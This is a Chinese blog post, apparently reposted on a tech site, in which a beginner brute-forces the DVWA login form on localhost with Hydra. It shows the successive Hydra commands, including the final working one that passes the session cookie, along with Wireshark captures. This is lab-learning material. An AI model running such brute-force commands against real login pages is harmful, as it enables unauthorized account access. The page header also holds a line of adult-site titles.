www.久久久久|狼友网站av天堂|精品国产无码a片|一级av色欲av|91在线播放视频|亚洲无码主播在线|国产精品草久在线|明星AV网站在线|污污内射久久一区|婷婷综合视频网站

當(dāng)前位置:首頁 > 芯聞號 > 充電吧
[導(dǎo)讀]剛剛開始學(xué)習(xí)web安全, 在本地機器上搭建了dvwa測試環(huán)境, 開始brute force的測試。 下面是通過瀏覽器顯示出來的html代碼 Username: Password:

剛剛開始學(xué)習(xí)web安全, 在本地機器上搭建了dvwa測試環(huán)境, 開始brute force的測試。

下面是通過瀏覽器顯示出來的html代碼

Username:

Password:


Username and/or password incorrect.


通過下方的鏈接http://hiderefer.com/?http://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29提供了兩個暴力美學(xué)破解的工具, 由于本機環(huán)境是linux, 很自然的選擇hydra(hydra是九頭蛇的意思, 一般看到英文的軟件名字, 如果不知道他的中文翻譯或者是哪幾個單詞的縮寫, 那么每次使用心里都會怪怪的)。

一開始認(rèn)為暴力破解很簡單, 就是提供一個用戶名和密碼(或者字典)給自動化工具, 然后就開始漫長的等待就行了, 所以也沒多想, 直接運行命令:

hydra -l admin -P password.txt ?127.0.0.1 http-get "/dvwa/vulnerabilities/brute/"

輸出的結(jié)果如下:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-13 23:23:55
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking service http-get on port 80
[80][www] host: 127.0.0.1   login: admin   password: aaaaa
[80][www] host: 127.0.0.1   login: admin   password: password
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-13 23:23:56


發(fā)現(xiàn)密碼文件中的兩個提供的密碼都通過驗證了, 明顯不對。

第二次運行命令:

?hydra -l admin -P password.txt ?127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/"

運行結(jié)果:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-13 23:26:32
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: (null)

這次直接報錯, 原諒我這是第一次使用Hydra這個工具, 第一次接觸暴力破解。

上google搜索了一下hydra的用法, 以及相關(guān)的資料, 第三次運行命令:

hydra -l admin -P password.txt -vV 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect."

輸出結(jié)果如下:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-13 23:30:07
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "aaaaa" - 1 of 2 [child 0]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 2 of 2 [child 1]
[VERBOSE] Page redirected to http://127.0.0.1/dvwa/vulnerabilities/brute/../../login.php
[VERBOSE] Page redirected to http://127.0.0.1/dvwa/vulnerabilities/brute/../../login.php
[80][www-form] host: 127.0.0.1   login: admin   password: password
[STATUS] attack finished for 127.0.0.1 (waiting for children to complete tests)
[80][www-form] host: 127.0.0.1   login: admin   password: aaaaa
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-13 23:30:17

oh, my god, 這個和第一次是一樣的。

然后開始對照是不是字母拼寫錯誤或者最后的失敗語句錯了, 在確定一切都沒錯之后開始邊懷疑這個工具的正確性邊開始google類似的問題, 期間還使用了fireforce這個工具試了一把, 結(jié)果也不太對。 這個時候已經(jīng)非常沮喪了, 處于崩潰的邊緣了......終于在backtrack論壇上發(fā)現(xiàn)了有人也是類似的問題, 后面有人回復(fù)說這個不是BasicAuthentication, 而是Form-based Authentication, 還有人說得用burp suite或者wireshark抓包看看真相是什么。 好吧, 由于沒有聽說過HTTP Authentication這個名詞, 趕緊去google一下, 還是OWASP的這篇文章https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29解答了我這方面的全部疑惑, 期間順便補充了一下Base64編碼的知識, 這些之前僅僅處于聽說過狀態(tài)。

由于沒有用過Burp Suite, 所以直接選擇了wireshark, 抓包分析。

在頁面上隨便輸入用戶名和密碼提交后, wireshark發(fā)現(xiàn)每次瀏覽器都會自動提交cookie:

GET /dvwa/vulnerabilities/brute/?username=admin&password=asdff&Login=Login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dvwa/vulnerabilities/brute/
Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4
Connection: keep-alive

之后通過wireshark抓包發(fā)現(xiàn)這個cookie是在使用瀏覽器登錄的時候就設(shè)置好的, 不同的瀏覽器cookie是不同的, 開始默認(rèn)的security= high, 當(dāng)修改安全級別后服務(wù)器會重新發(fā)送set-cookie 為low, 以后每次提交表單或者get 操作都要提交這個cookie, 負(fù)責(zé)服務(wù)器驗證是通不過的。

下面是重新使用google瀏覽器登錄dvwa, 服務(wù)器的response信息:

HTTP/1.1 302 Found
Date: Tue, 13 Aug 2013 15:55:30 GMT
Server: Apache/2.4.3 (Unix) OpenSSL/1.0.1c PHP/5.4.7
X-Powered-By: PHP/5.4.7
Set-Cookie: PHPSESSID=uku6iitcv0hhhd9mvna69sl9v7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=high
Location: ../../login.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

當(dāng)我們登錄成功后將安全等級提交為low后, 可以看到cookie的變化如下:

POST /dvwa/security.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/dvwa/security.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: security=high; PHPSESSID=uku6iitcv0hhhd9mvna69sl9v7

security=low&seclev_submit=SubmitHTTP/1.1 302 Found
Date: Tue, 13 Aug 2013 15:57:03 GMT
Server: Apache/2.4.3 (Unix) OpenSSL/1.0.1c PHP/5.4.7
X-Powered-By: PHP/5.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=low
Location: /dvwa/security.php
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

GET /dvwa/security.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Referer: http://127.0.0.1/dvwa/security.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: security=low; PHPSESSID=uku6iitcv0hhhd9mvna69sl9v7


可以看到之后的cookie已經(jīng)變過來了。


OK, 下面繼續(xù)進(jìn)行Hydra的命令操作, 第n次運行命令, 這個是使用的firefox瀏覽器:

?hydra -l admin -P password.txt ?127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4"


輸出如下:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-14 00:13:37
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-14 00:13:37


可以看到這次的運行結(jié)果是正確的。 長舒一口氣之后陷入了迷惑中, 通過運行hydra -h或者是man hydra并沒有說有 :H這個說法, 上網(wǎng)google看到很多使用:C選項的, 這個工具到底怎么用, 什么時候使用:C 什么時候使用:H, google之后并沒有發(fā)現(xiàn)有人說怎么用, 沒辦法, 只能去看源代碼。 幸好是c語言的, 我的偏愛。

后來又經(jīng)過wireshark抓包分析,以及對比源代碼分析, 發(fā)現(xiàn):C指定的是cookie文件的路徑, 這個路徑是服務(wù)器上的路徑, 也就是說如果服務(wù)器上存放cookie的文件是/path/cookie, 那么就可以用:C=/path/cookie來指定hydra從服務(wù)器上獲取cookie, 然后自動添加到每次的get或者post的http header中, 如果像dvwa這樣沒有cookie的專門文件或者我們不知道cookie的存放文件, 那么就用:H來每次手動指定。

如果指定了:C=/path/cookie 那么每次hydra提交之前首先會去get /path/cookie 來得到cookie, 然后每次分析response返回的信息,自動將cookie添加到http 的header中。

:H其實是用來手動添加Header 域的, 比如上面的我們手動添加了 :H=Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4, 這其實是告訴hydra每次get或者post的時候要添加上這個:H后面的頭部的域。

通過大概的閱讀源代碼可以得知如果hydra捕獲了response中的set-cookie, 那么我們也不用每次手動添加cookie。


目前為止已經(jīng)基本弄明白了如何使用hydra來進(jìn)行http的brute force測試, 后面還會繼續(xù)嘗試hydra應(yīng)用于別的協(xié)議的暴力美學(xué)破解。

每天都有進(jìn)步的生活是值得期待的!














本站聲明: 本文章由作者或相關(guān)機構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點,本站亦不保證或承諾內(nèi)容真實性等。需要轉(zhuǎn)載請聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請及時聯(lián)系本站刪除。
換一批
延伸閱讀

9月2日消息,不造車的華為或?qū)⒋呱龈蟮莫毥谦F公司,隨著阿維塔和賽力斯的入局,華為引望愈發(fā)顯得引人矚目。

關(guān)鍵字: 阿維塔 塞力斯 華為

加利福尼亞州圣克拉拉縣2024年8月30日 /美通社/ -- 數(shù)字化轉(zhuǎn)型技術(shù)解決方案公司Trianz今天宣布,該公司與Amazon Web Services (AWS)簽訂了...

關(guān)鍵字: AWS AN BSP 數(shù)字化

倫敦2024年8月29日 /美通社/ -- 英國汽車技術(shù)公司SODA.Auto推出其旗艦產(chǎn)品SODA V,這是全球首款涵蓋汽車工程師從創(chuàng)意到認(rèn)證的所有需求的工具,可用于創(chuàng)建軟件定義汽車。 SODA V工具的開發(fā)耗時1.5...

關(guān)鍵字: 汽車 人工智能 智能驅(qū)動 BSP

北京2024年8月28日 /美通社/ -- 越來越多用戶希望企業(yè)業(yè)務(wù)能7×24不間斷運行,同時企業(yè)卻面臨越來越多業(yè)務(wù)中斷的風(fēng)險,如企業(yè)系統(tǒng)復(fù)雜性的增加,頻繁的功能更新和發(fā)布等。如何確保業(yè)務(wù)連續(xù)性,提升韌性,成...

關(guān)鍵字: 亞馬遜 解密 控制平面 BSP

8月30日消息,據(jù)媒體報道,騰訊和網(wǎng)易近期正在縮減他們對日本游戲市場的投資。

關(guān)鍵字: 騰訊 編碼器 CPU

8月28日消息,今天上午,2024中國國際大數(shù)據(jù)產(chǎn)業(yè)博覽會開幕式在貴陽舉行,華為董事、質(zhì)量流程IT總裁陶景文發(fā)表了演講。

關(guān)鍵字: 華為 12nm EDA 半導(dǎo)體

8月28日消息,在2024中國國際大數(shù)據(jù)產(chǎn)業(yè)博覽會上,華為常務(wù)董事、華為云CEO張平安發(fā)表演講稱,數(shù)字世界的話語權(quán)最終是由生態(tài)的繁榮決定的。

關(guān)鍵字: 華為 12nm 手機 衛(wèi)星通信

要點: 有效應(yīng)對環(huán)境變化,經(jīng)營業(yè)績穩(wěn)中有升 落實提質(zhì)增效舉措,毛利潤率延續(xù)升勢 戰(zhàn)略布局成效顯著,戰(zhàn)新業(yè)務(wù)引領(lǐng)增長 以科技創(chuàng)新為引領(lǐng),提升企業(yè)核心競爭力 堅持高質(zhì)量發(fā)展策略,塑強核心競爭優(yōu)勢...

關(guān)鍵字: 通信 BSP 電信運營商 數(shù)字經(jīng)濟

北京2024年8月27日 /美通社/ -- 8月21日,由中央廣播電視總臺與中國電影電視技術(shù)學(xué)會聯(lián)合牽頭組建的NVI技術(shù)創(chuàng)新聯(lián)盟在BIRTV2024超高清全產(chǎn)業(yè)鏈發(fā)展研討會上宣布正式成立。 活動現(xiàn)場 NVI技術(shù)創(chuàng)新聯(lián)...

關(guān)鍵字: VI 傳輸協(xié)議 音頻 BSP

北京2024年8月27日 /美通社/ -- 在8月23日舉辦的2024年長三角生態(tài)綠色一體化發(fā)展示范區(qū)聯(lián)合招商會上,軟通動力信息技術(shù)(集團)股份有限公司(以下簡稱"軟通動力")與長三角投資(上海)有限...

關(guān)鍵字: BSP 信息技術(shù)
關(guān)閉
關(guān)閉